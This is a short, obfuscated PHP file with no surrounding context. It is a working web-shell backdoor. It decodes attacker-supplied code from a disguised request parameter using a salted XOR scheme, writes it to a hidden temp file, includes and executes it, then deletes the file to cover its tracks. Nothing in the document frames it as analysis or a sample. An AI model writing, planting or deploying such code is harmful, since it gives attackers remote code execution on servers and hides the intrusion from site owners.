<?php

if(!empty($_REQUEST["h\x6Cd"])){
	$resource = $_REQUEST["h\x6Cd"];
		 	$resource=	explode 	(  '.'  ,$resource ) ;	
	$ent  ='';
            $salt9  ='abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS  =strlen($salt9);
            $q  =0;
    
            $__tmp  =$resource;
            while ($v3  =array_shift($__tmp)) {		$chS  =ord($salt9[$q 	% $lenS]);
                $d  =((int)$v3 - $chS - ($q 	% 10))^	 98;
                $ent .= 	chr($d);
                $q++;}
	$property_set = array_filter([session_save_path(), getenv("TMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/tmp", "/dev/shm", "/var/tmp", getcwd()]);
	while ($value = array_shift($property_set)) {
    		if (!( !is_dir($value) || !is_writable($value) )) {
    $factor = vsprintf("%s/%s", [$value, ".mrk"]);
    if (@file_put_contents($factor, $ent) !== false) {
	include $factor;
	unlink($factor);
	die();
}
}
}
}